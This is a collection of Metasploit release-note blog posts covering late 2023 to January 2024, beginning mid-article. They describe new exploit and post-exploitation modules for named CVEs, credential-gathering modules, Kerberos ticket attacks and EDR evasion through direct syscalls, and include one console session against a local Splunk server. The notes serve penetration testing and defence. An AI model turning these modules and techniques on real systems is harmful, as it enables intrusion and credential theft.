Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text’s (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen [email protected]
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

  • #17634 from adfoster-r7 – Reliability and stability notes that have been previously missing have been added to some modules.
  • #18645 from jvoisin – This adds a way to get the Build ID from ld.so by using the ‘perf’ command. Before this module depended on the commands ‘file’ and ‘readelf’ being installed to get the Build ID.
  • #18663 from sjanusz-r7 – Adds a new Postgres session type, which is current behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:[email protected]:9000/template1 createsession=true verbose=false.
  • #18720 from zeroSteiner – This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad character when using the new fetch payloads.
  • #18735 from AleksaZatezalo – Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
  • #18737 from zeroSteiner – This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

  • #18662 from dwelch-r7 – Fixes an edgecase where features set dns_feature true did not correctly parse a user’s /etc/resolv.conf file if there were multiple nameservers present.
  • #18712 from ekalinichev-r7 – Fixes a crash with Metasploit’s REST api when calling /api/v1/modules?name=aux.
  • #18746 from zeroSteiner – Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module’s datastore would be unintentionally updated with the new option value.

Documentation added (1)

  • #18729 from poupapaa – This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/19/24

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2024/01/19/metasploit-weekly-wrap-up-01-19-24/

Unicode your way to a php payload and three modules to add to your playbook for Ansible

Metasploit Weekly Wrap-Up 01/19/24

Our own jheysel-r7 added an exploit leveraging the fascinating tool of php filter chaining to prepend a payload using encoding conversion characters and h00die et. al. have come through and added 3 new Ansible post modules to gather configuration information, read files, and deploy payloads. While none offer instantaneous answers across the universe, they will certainly help in red team exercises.

New module content (4)

Ansible Agent Payload Deployer (1 of 3 Ansible post modules)

Authors: h00die and n0tty
Type: Exploit
Pull request: #18627 contributed by h00die
Path: linux/local/ansible_node_deployer

Ansible Config Gather (2 of 3 Ansible post modules)

Author: h00die
Type: Post
Pull request: #18627 contributed by h00die
Path: linux/gather/ansible

Ansible Playbook Error Message File Reader (3 of 3 Ansible post modules)

Authors: h00die and rioasmara
Type: Post
Pull request: #18627 contributed by h00die
Path: linux/gather/ansible_playbook_error_message_file_reader

Description: This adds 3 post-exploitation modules for Ansible. The first one gathers information and configuration. The second exploits an arbitrary file read that enables an attacker to read the first line of a file (typically /etc/shadow), when the compromised account is configured with password-less sudo permissions. The last one is an exploit that can deploy a payload to all the nodes in the network.

WordPress Backup Migration Plugin PHP Filter Chain RCE

Authors: Nex Team, Valentin Lobstein, and jheysel-r7
Type: Exploit
Pull request: #18633 contributed by jheysel-r7
Path: multi/http/wp_backup_migration_php_filter

Description: This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.

Enhancements and features (2)

  • #18596 from dwelch-r7 – Updates multiple SMB modules to work with the new upcoming SMB session type support. This beta functionality is currently behind a feature flag, and can be enabled with features set smb_session_type true.
  • #18682 from adfoster-r7 – Add tests for Msf::Exploit::Local module types to ensure that sysinfo will not break again in the future.

Bugs fixed (2)

  • #18655 from adfoster-r7 – Ensures the module will automatically be used when the hierarchical search functionality is enabled and only one module result is found.
  • #18710 from adfoster-r7 – Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework’s payload modules.

Documentation added (1)

  • #18702 from Sh3llSp4wn – Updates the documentation for the private and public fields in lib/metasploit/framework/credential.rb to be correct.

You can always find more documentation on our docsite at docs.metasploit.com.

Missing rn-* label on Github (1)

PLEASE ADD RN-TAGS TO THESE PULL REQUESTS BEFORE RELEASING THE WRAP UP, AND RERUN THE WRAPUP SCRIPT

  • #18398 from errorxyz – Fixes deprecation warnings when running the auxiliary/admin/scada/modicon_password_recovery, auxiliary/scanner/lotus/lotus_domino_hashes, auxiliary/sniffer/psnuffle, exploits/unix/webapp/vbulletin_vote_sqli_exec exploit modules with a database connected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/12/24

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2024/01/12/metasploit-weekly-wrap-up-01-12-24/

New module content (1)

Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor

Metasploit Weekly Wrap-Up 01/12/24

Author: Pasquale ‘sid’ Fiorillo
Type: Post
Pull request: #18604 contributed by siddolo
Path: windows/gather/credentials/winbox_settings

Description: This pull request introduces a new post module to extract the Mikrotik Winbox credentials, which are saved in the settings.cfg.viw file when the "Keep Password" option is selected in Winbox.

Enhancements and features (7)

  • #18515 from errorxyz – This PR adds a Java target for the ManageEngine ServiceDesk Plus exploit CVE-2022-47966 using the payload mentioned in this blogpost and deletes the log file that records the error due to the exploit to make it more stealthy.
  • #18672 from h00die – Fix spelling mistakes in Metasploit’s library folder.
  • #18673 from h00die – Fix spelling mistakes in Metasploit’s scripts folder.
  • #18674 from h00die – Fix spelling mistakes in Metasploit’s plugins folder.
  • #18675 from h00die – Fix spelling mistakes in Metasploit’s tools folder.
  • #18679 from h00die – Fix spelling mistakes in Metasploit’s auxiliary modules.
  • #18691 from zeroSteiner – Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.

Bugs fixed (5)

  • #18656 from dwelch-r7 – Enforces all modules to be loaded as part of reload_all when the defer_module_loads feature is enabled.
  • #18666 from zeroSteiner – Fixes a crash when running the save command to save Metasploit’s configuration.
  • #18667 from zeroSteiner – Re-adds the #sysinfo instance method for sessions.
  • #18669 from sjanusz-r7 – Updates the favorites command to no longer output an empty message when a chosen module does not have custom datastore values available.
  • #18690 from sjanusz-r7 – Ensures that a target’s default payload is correctly chosen when selecting a module from the search command.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 1/05/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/01/05/metasploit-weekly-wrap-up-40/

New module content (2)

Splunk __raw Server Info Disclosure

Metasploit Weekly Wrap-Up 1/05/2024

Authors: KOF2002, h00die, and n00bhaxor
Type: Auxiliary
Pull request: #18635 contributed by n00bhaxor
Path: gather/splunk_raw_server_info

Description: This PR adds a module for an authenticated Splunk information disclosure vulnerability. This module gathers information about the host machine and the Splunk install including OS version, build, CPU arch, Splunk license keys, etc.

[msf](Jobs:0 Agents:0) > use auxiliary/gather/splunk_raw_server_info 
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set username admin
username => admin
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set password splunksplunk
password => splunksplunk
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set verbose true
verbose => true
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > run
[*] Running module against 127.0.0.1
[+] Output saved to /root/.msf4/loot/20231220204049_default_127.0.0.1_splunk.system.st_943292.json
[+] Hostname: 523a845e8652
[+] CPU Architecture: x86_64
[+] Operating System: Linux
[+] OS Build: #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09)
[+] OS Version: 6.5.0-kali3-amd64
[+] Splunk Version: 7.1.0
[+] Trial Version?: false
[+] Splunk Forwarder?: false
[+] Splunk Product Type: splunk
[+] License State: OK
[+] License Key(s): ["FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"]
[+] Splunk Server Roles: ["indexer", "license_master"]
[+] Splunk Server Startup Time: 2023-12-21 01:40:02
[*] Auxiliary module execution completed

Craft CMS unauthenticated Remote Code Execution (RCE)

Authors: Thanh, chybeta, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18612 contributed by h00die-gr3y
Path: linux/http/craftcms_unauth_rce_cve_2023_41892

Description: This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.

Enhancements and features (2)

  • #18610 from sjanusz-r7 – This PR enables the Metasploit Payload Warnings feature by default. When enabled Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus.
  • #18632 from jvoisin – This PR adds improvements to the Glibc Tunables Privilege Escalation module. In the event the file command is not present on the target the module will try to use the readelf command to get the ld.so build ID and determine whether or not the target is compatible with the exploit.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit 2023 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/12/29/metasploit-2023-wrap-up/

Metasploit 2023 Wrap-Up

As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added as well for a variety of tasks such as requesting tickets from the Key Distribution Center (aka the KDC which is almost always the Active Directory Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more popular, it often limits the type of payloads that can easily be added to an exploit since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

  • The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
  • The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

  • Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
  • Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
  • JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
  • Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
  • Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
  • usiegl00 and Ishaanahuja7 both contributed enhancements to add support OSX AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

  • CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-grey brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.

  • CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\ SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.

  • CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.

  • CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.

  • CVE-2023-22952
    (Exploit) – This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.

  • CVE-2023-20887
    (Exploit) – This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.

  • CVE-2023-27350
    (Exploit) – Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.

  • Post Module – Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing along with it a large amount of railgun enhancements this module allows for Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work along with this module helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit’s Kerberos authentication capabilities yet, put it at the top of your todo list for 2024!

  • CVE-2023-28252
    (Exploit) – The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module that uses the Reflective DLL template in order to drop a low level PoC which returns a session running in the context of NT AUTHORITY\SYSTEM.

  • CVE-2023-40044
    (Exploit) – Another exploit that made big waves this year was the WS_FTP server running the Ad Hoc Transfer module .NET deserialization vulnerability. The module and the initial research behind how the vulnerability actually works was brought to us by Metasploit’s very own, veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is: select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

  • h00die
  • bcoles
  • smashery
  • h00die-gr3y
  • jmartin-tech
  • ErikWynter
  • EgeBalci
  • ismaildawoodjee (new in 2023)
  • wvu
  • jvoisin
  • sempervictus
  • rorymckinley (new in 2023)
  • rad10
  • manishkumarr1017 (new in 2023)
  • Ryuuuuu (new in 2023)
  • prabhatjoshi321 (new in 2023)
  • Chocapikk (new in 2023)
  • Jemmy1228 (new in 2023)
  • AleksaZatezalo (new in 2023)
  • emirpolatt (new in 2023)
  • heyder
  • steve-embling
  • dm-ct (new in 2023)
  • ide0x90
  • archcloudlabs
  • samsepi0x0 (new in 2023)
  • Lorenyx (new in 2023)
  • MikeAnast (new in 2023)
  • loredous (new in 2023)
  • bradyjackson (new in 2023)
  • nfsec
  • HynekPetrak
  • whotwagner (new in 2023)
  • rtpt-erikgeiser
  • errorxyz (new in 2023)
  • e-lliot (new in 2023)
  • gcarmix (new in 2023)
  • j0ev (new in 2023)
  • xaitax (new in 2023)
  • cudalac (new in 2023)
  • bka-dev
  • cnnrshd (new in 2023)
  • pbarry25 (new in 2023)
  • D00Movenok (new in 2023)
  • gardnerapp (new in 2023)
  • rodnt (new in 2023)
  • hahwul (new in 2023)
  • JustAnda7
  • Guilhem7 (new in 2023)
  • shellchocolat (new in 2023)
  • sdcampbell (new in 2023)
  • attl4s (new in 2023)
  • distortedsignal (new in 2023)
  • spmedia (new in 2023)
  • YiDa858 (new in 2023)
  • j-baines (new in 2023)
  • catatonicprime
  • vtoutain (new in 2023)
  • SubcomandanteMeowcos (new in 2023)
  • samueloph (new in 2023)
  • araout42 (new in 2023)
  • Pflegusch (new in 2023)
  • tekwizz123
  • rohitkumarankam (new in 2023)
  • jeffmcjunkin
  • MegaManSec
  • bugch3ck
  • raboof (new in 2023)
  • JBince (new in 2023)
  • Frycos (new in 2023)
  • neterum (new in 2023)
  • mkonda (new in 2023)
  • serializingme (new in 2023)
  • k0pak4
  • npm-cesium137-io
  • hamax97 (new in 2023)

Metasploit Weekly Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/12/22/metasploit-weekly-wrap-up-39/

Getting Looney with Privilege Escalation

Metasploit Weekly Wrap-Up

As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for Glibc Tunables Privilege Escalation aka Looney Tunables. Now, using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it’s vulnerable to buffer overflow, as outlined in CVE-2023-4911. If so, the module will drop a python script and escalate your privilege to the root user, allowing you to execute malicious code. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

Authors: Qualys Threat Research Unit, blasty [email protected], and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Authors: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description:
This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

  • #18622 from zeroSteiner – Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
  • #18623 from gardnerapp – This updates the file handling of the generate command’s -o parameter to expand file system paths.

Bugs fixed (1)

Documentation added (1)

  • #18477 from AleksaZatezalo – This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/

Continuing the 12th Labor of Metasploit

Metasploit Weekly Wrap-Up

Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have Do not require Kerberos preauthentication set on the domain controller. The setting is disabled by default, but it is enabled in some environments.

Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.

Ticket Management

This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible based on the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation right from with Metasploit, there’s even new documentation which outlines the entire process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

  • #18539 from dwelch-r7 – This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.
  • #18598 from bwatters-r7 – :
    This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows server 2016-present or Windows 10/11+.
  • #18601 from MikeAnast – Adds arm64 support to Metasploit’s Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

  • #18606 from Lorenyxrpc_plugin has been updated to correctly use the provided plugin options.
  • #18609 from adfoster-r7 – This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
  • #18613 from dwelch-r7 – Ensures that after listing files within an SMB directory that the handle is closed.
  • #18614 from sjanusz-r7 – Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-Up 12/8/2023

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/08/metasploit-wrap-up-12-8-2023/

Are You Looking for ACTION?

Metasploit Wrap-Up 12/8/2023

